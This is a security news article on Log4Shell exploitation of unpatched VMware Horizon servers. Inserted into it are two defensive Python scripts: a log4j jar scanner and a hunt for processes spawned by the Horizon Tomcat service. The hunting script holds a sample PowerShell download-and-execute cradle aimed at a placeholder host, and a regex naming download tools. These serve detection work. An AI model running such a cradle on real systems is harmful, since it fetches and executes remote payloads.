
VMware Warns of Log4j Attacks Targeting Horizon Servers

VMware is urging customers to patch their VMware Horizon instances as these systems have been targeted in a recent wave of attacks exploiting the Log4Shell vulnerability.

Tracked as CVE-2021-44228, the security flaw was identified in early December 2021 in the Apache Log4j logging utility, and has since been exploited in attacks by both cybercriminals and state-sponsored threat actors.

Soon after the vulnerability was disclosed, VMware confirmed that Horizon products were affected and released patches, but many customers have been slow to apply them.

Now, the company says that, despite its efforts, attackers are successful in compromising organizations by targeting VMware Horizon products that haven’t been patched against Log4Shell.

“VMware Horizon products are vulnerable to critical Apache Log4j/Log4Shell vulnerabilities unless properly patched or mitigated using the information provided in our security advisory, VMSA 2021-0028, which was first published on Dec. 10, 2021 and updated regularly with new information,” VMware said in an alert.

“Customers who have not applied either the patch or the latest workaround provided in VMware’s security advisory are at risk of being compromised—or may have already been compromised—by threat actors who are leveraging the Apache Log4Shell vulnerability to actively compromise unpatched, internet-facing Horizon environments,” the company continues.

VMware notes that while its SaaS offerings are patched by VMware itself, organizations running on-premises products must apply the available security updates on their own.


The company says it has contacted customers directly to guide them through the patching process, but some organizations have still not patched. VMware urges them to apply the security updates as soon as possible, given that the vulnerability is being actively exploited.
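As an added example (not VMware's tooling and not part of the advisory or this article), the following Python script shows the kind of check an on-premises administrator can run to confirm that the patch or workaround actually landed on a host. It walks a directory tree for log4j-core jars, reads the version from each jar's manifest (falling back to the file name), and reports a jar as vulnerable when its version predates 2.15.0, the Log4j release that fixed CVE-2021-44228, and it still contains the JndiLookup class. The 2.15.0 threshold, the class-removal test, and the sample jars built in a temporary directory are all assumptions made by this example so that it runs offline.

```python
"""Check log4j-core jars for the Log4Shell (CVE-2021-44228) condition.

Added example, not VMware's or SecurityWeek's code. Assumptions (not from
the article): a jar is treated as vulnerable when its log4j-core version is
older than 2.15.0 (the release that fixed CVE-2021-44228) AND it still
contains org/apache/logging/log4j/core/lookup/JndiLookup.class, i.e. the
class-removal workaround has not been applied. The sample jars are
constructed in a temp directory so the script runs offline.
"""
import os
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_VERSION = (2, 15, 0)  # assumption: first release fixing CVE-2021-44228
_NAME_RE = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")
_MANIFEST_RE = re.compile(r"Implementation-Version:\s*(\d+)\.(\d+)\.(\d+)")


def log4j_version(jar_path):
    """Return the version tuple from the jar manifest, or from the file name."""
    with zipfile.ZipFile(jar_path) as zf:
        try:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        except KeyError:
            manifest = ""
    m = _MANIFEST_RE.search(manifest) or _NAME_RE.search(os.path.basename(jar_path))
    return tuple(int(x) for x in m.groups()) if m else None


def has_jndi_lookup(jar_path):
    """True if the JNDI lookup class is still packaged (workaround not applied)."""
    with zipfile.ZipFile(jar_path) as zf:
        return JNDI_CLASS in zf.namelist()


def assess_jar(jar_path):
    """Classify one jar as 'vulnerable', 'mitigated', 'patched' or 'unknown'."""
    version = log4j_version(jar_path)
    if version is None:
        return "unknown"
    if version >= FIXED_VERSION:
        return "patched"
    return "vulnerable" if has_jndi_lookup(jar_path) else "mitigated"


def scan(root):
    """Walk a directory tree (e.g. a Horizon install) and assess every log4j-core jar."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): assess_jar(str(p))
            for p in root.rglob("log4j-core-*.jar")}


def _make_jar(path, version, include_jndi):
    """Build a constructed sample jar with a manifest and optional JndiLookup entry."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not real bytecode


def demo():
    """Create three constructed jars (unpatched, workaround applied, patched) and scan them."""
    tmp = tempfile.mkdtemp()
    _make_jar(os.path.join(tmp, "log4j-core-2.14.1.jar"), "2.14.1", True)
    stripped = os.path.join(tmp, "lib", "log4j-core-2.14.1.jar")
    os.makedirs(os.path.dirname(stripped))
    _make_jar(stripped, "2.14.1", False)
    _make_jar(os.path.join(tmp, "log4j-core-2.17.1.jar"), "2.17.1", True)
    return scan(tmp)


if __name__ == "__main__":
    for jar, status in sorted(demo().items()):
        print(f"{status:10s} {jar}")
```

Point `scan()` at the real install root instead of the constructed directory to audit a host; a jar reported as "mitigated" still runs old code and should be replaced by the vendor patch when one is available.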

BlackBerry has also observed an increase in Log4j attacks targeting the Tomcat service used by VMware Horizon, and says organizations can reliably detect potential compromise by “monitoring child processes of the ws_TomcatService.exe parent process.”

Following the initial compromise, PowerShell commands are used to download a second-stage payload, which may include cryptomining malware, ransomware, or other malicious tools. In some cases, a Cobalt Strike beacon was deployed.
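The hunting logic BlackBerry describes, and the PowerShell second-stage download pattern noted above, as an added example in Python (not BlackBerry's or VMware's code): it runs over constructed process-creation records shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine), flags any child of ws_TomcatService.exe, raises the severity for interpreters and LOLBins, and raises it again when the command line carries a download or decode cradle. The list of suspect child binaries and the cradle indicators are assumptions of this example, not from the article; the sample events are constructed, not real telemetry.

```python
"""Flag suspicious child processes of the VMware Horizon Tomcat service.

Added example, not BlackBerry's or VMware's code. Implements the hunting
logic quoted in the article (monitor children of ws_TomcatService.exe) over
constructed process-creation records with Sysmon Event ID 1-style fields.
The allow-list of suspect children and the download-cradle indicators are
assumptions, not from the page.
"""
import re

TOMCAT_SERVICE = "ws_tomcatservice.exe"

# Assumption: interpreters and LOLBins an attacker would spawn from Tomcat.
SUSPECT_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe", "bitsadmin.exe",
    "mshta.exe", "rundll32.exe", "wscript.exe", "cscript.exe", "curl.exe",
}

# Assumption: strings typical of a second-stage download or decode cradle.
DOWNLOAD_INDICATORS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|iwr |wget |curl |"
    r"net\.webclient|start-bitstransfer|frombase64string|-enc(odedcommand)? )",
    re.IGNORECASE,
)


def _basename(image):
    """Lower-cased file name of a Windows or POSIX image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a finding dict for a child of the Tomcat service, else None."""
    if _basename(event.get("ParentImage", "")) != TOMCAT_SERVICE:
        return None
    child = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    reasons = [f"child of {TOMCAT_SERVICE}: {child}"]
    severity = "medium"  # any child of the web service merits a look
    if child in SUSPECT_CHILDREN:
        severity = "high"
        reasons.append("interpreter or LOLBin spawned by the web service")
    if DOWNLOAD_INDICATORS.search(cmd):
        severity = "critical"
        reasons.append("command line contains a download/decode cradle")
    return {"severity": severity, "child": child, "reasons": reasons}


def hunt(events):
    """Apply classify() to a stream of process-creation events."""
    return [hit for hit in (classify(e) for e in events) if hit]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/stage2')\""},
    {"ParentImage": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": "conhost.exe 0xffffffff -ForceV1"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["severity"].upper(), hit["child"], "|", "; ".join(hit["reasons"]))
```

The parent-process match is the part that carries the signal: a web service wrapper has few legitimate reasons to spawn a shell, so even the "medium" hits are worth triage, and the cradle match only decides how urgently.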

BlackBerry believes that the attacks were conducted by an initial access broker (IAB) tracked as Prophet Spider. After compromising enterprise networks, the threat actor usually sells access to ransomware operators.

“When an initial access broker group takes interest in a vulnerability whose scope may never be known, this gives us a good indication that they see significant value in its exploitation. It’s likely that we will continue to see criminal groups exploring the opportunities of the Log4Shell vulnerability in the near future, as IT teams and users continue to scramble to address these vulnerabilities,” BlackBerry concludes.

Related: Log4Shell Tools and Resources for Defenders – Continuously Updated

Related: SolarWinds Patches Serv-U Vulnerability Propagating Log4j Attacks

Related: Ukraine Attacks Involved Exploitation of Log4j, October CMS Vulnerabilities

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
